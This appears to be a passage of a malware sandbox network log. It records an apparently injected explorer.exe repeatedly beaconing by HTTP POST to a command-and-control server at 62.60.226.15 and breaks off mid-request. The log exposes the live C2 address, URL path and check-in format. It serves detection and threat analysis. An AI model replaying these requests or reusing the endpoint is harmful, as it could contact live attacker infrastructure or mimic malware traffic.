                                                Date: Mon, 16 Dec 2024 14:27:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.104973562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:20.123505116 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:21.397772074 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:21 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.104973662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:23.032721996 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:24.316565037 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.104973762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:26.249377966 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:27.406558990 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:27 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.104973862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:29.146754980 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:30.416800022 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.104973962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:32.156647921 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:33.426440001 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:33 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.104974062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:35.061167955 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:36.331129074 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.104974162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:38.076776028 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:39.343921900 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:39 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.104974262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:40.972737074 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.104974462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:46.720798969 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:47.992178917 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.104974562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:49.626089096 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:50.896311998 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.104974662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:52.641288042 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:53.914063931 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.104974762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:55.547861099 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:56.847098112 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.104974862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:58.594050884 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:59.914592981 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.104974962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:01.628324986 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:02.874509096 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.104975062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:04.655003071 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:05.949956894 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.104975162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:07.578259945 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:08.862075090 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.104975262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:10.610791922 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:11.888140917 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.104975362.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:13.517308950 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:14.913259983 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.104975462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:16.657264948 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:17.950202942 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.104975562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:19.585283995 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:20.870526075 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:20 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.104975662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:22.611706972 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:23.925257921 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.104975762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:25.563541889 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:26.839324951 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.104975862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:28.598573923 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:29.870234966 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.104975962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:31.501028061 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
